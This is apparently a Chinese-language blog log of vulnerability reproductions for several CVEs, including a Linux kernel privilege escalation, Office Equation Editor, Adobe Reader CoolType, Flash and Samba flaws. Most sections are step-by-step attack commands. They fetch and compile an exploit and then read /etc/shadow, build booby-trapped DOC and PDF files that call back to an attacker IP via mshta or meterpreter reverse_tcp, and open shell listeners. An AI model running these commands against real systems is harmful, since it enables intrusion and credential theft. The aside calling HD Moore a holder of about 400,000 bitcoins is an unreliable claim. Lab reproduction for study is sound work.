CVE-2017-16995 & CVE-2017-11882 etc . CVE漏洞复现记录

漏洞复现 CVE-2017-16995 CVE-2017-11882…

参考链接:https://github.com/B1eed/VulRec

CVE-2017-16995 Ubuntu16.04

参考学习链接:https://zhuanlan.zhihu.com/p/35247850

1
2
3
4
5
6
7
8
9
10
11
12
13
影响版本: 
Linux内核:Linux Kernel Version 4.14 ~ 4.4
Ubuntu版本:16.04.01~ 16.04.04
测试命令:cat /proc/version
执行命令:
wget http://cyseclabs.com/pub/upstream44.c
sudo apt install gcc
gcc -o test upstream44.c
chmod +x test
ll
./test
id
cat /etc/shadow

[漏洞复现] CVE-2017-11882 通杀所有Office版本

1
2
3
4
5
6
7
8
9
此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。

举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。
影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016

攻击命令记录:

1
2
3
4
5
6
7
8
9
10
11
12
search CVE-2017-11882  //查看有无该payload
use exploit/windows/smb/cve-2017-11882
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.23.154 // (渗透机IP)
set uripath 11882
exploit

# 生成攻击文件
python CVE-2017-11882.py -c "mshta http://192.168.23.154:8080/11882" -o 11882-3.doc //注意修改为渗透机IP地址

# 把对应msf的payload文件(rb后缀)放到对应目录,下面是绝对目录路径
cd /usr/share/metasploit-framework/modules/exploits/windows/smb

攻击成功

参考链接:https://zhuanlan.zhihu.com/p/35248996

[漏洞复现] CVE-2010-2883 Adobe Reader 打开pdf电脑即刻中招

CVE-2010-2883漏洞原理:“Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。”

影响版本:Adobe Reader 8.2.4 - 9.3.4

攻击命令记录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# 搜索Adobe渗透模块  
search adobe_cooltype_sing
# 调用渗透模块
use exploit/windows/fileformat/adobe_cooltype_sing/
info
# 调用meterpreter载荷,反向连接到渗透机
set payload windows/meterpreter/reverse_tcp
# 设置Kali Linux的IP地址
set LHOST 192.168.23.154
# 设置本地监听端口
set LPORT 8888
# 设置带有后门程序的PDF文件
set FILENAME PINGINGLAB.pdf
# 执行渗透生成文件
exploit
# 将PDF木马文件拷贝至Kali Linux桌面
cp /root/.msf4/local/PINGINGLAB.pdf /root/Desktop/PINGINGLAB.pdf
# Metasploit开启shell监听会话,等待肉鸡上线
# 使用handler监听模块
use exploit/multi/handler
# 回弹一个tcp连接
set payload windows/meterpreter/reverse_tcp
# 设置监听IP地址(跟PDF木马文件一致)
set LHOST 192.168.23.154
# 设置监听的端口(跟PDF木马文件一致)
set LPORT 8888
# 开启监听
exploit

安装对应版本Adobe
参考网址:https://zhuanlan.zhihu.com/p/35249958

[漏洞复现] CVE-2018-4878 Flash 0day

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。

攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。

[漏洞复现] CVE-2017-7494 隐藏7年之久的Linux版"永恒之蓝"出现了…

漏洞原理:
Samba是在Linux或Unix系统上用来实现文件共享和打印服务的通信协议,也是很多家用的智能硬件设备例如NAS设备内置的协议,采用服务端口445。由于Samba内置函数is_known_pipename里面出现字符过滤问题,导致攻击者可以向共享目录传递恶意文件,导致被远程代码执行。

参考链接:
https://cvedetails.com/cve/CVE-2017-7494/
https://www.samba.org/samba/security/CVE-2017-7494.html

影响版本:
Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

渗透代码:
关于此Samba漏洞的渗透利用代码,最早发布的,便是鼎鼎大名的Metasploit创始人HD Moore。HD Moore出名,不仅仅在黑客和安全圈,在目前的币圈也是一位传奇,毕竟手握约40万个比特币,是世界上除了比特币创始人中本聪之外,持币量最多的人。就是这位“比你有钱又比你有才”的传奇人物,他在Samba漏洞公告的第二天,也就是2017年5月25号,就在github上公布了针对此漏洞的exp代码。当然,目前Metasploit框架也已经集成了这个exp代码。

参考链接:https://zhuanlan.zhihu.com/p/35321152

CVE-2018-15982FlashPlayer漏洞复现

参考链接:https://bbs.ichunqiu.com/thread-48986-1-1.html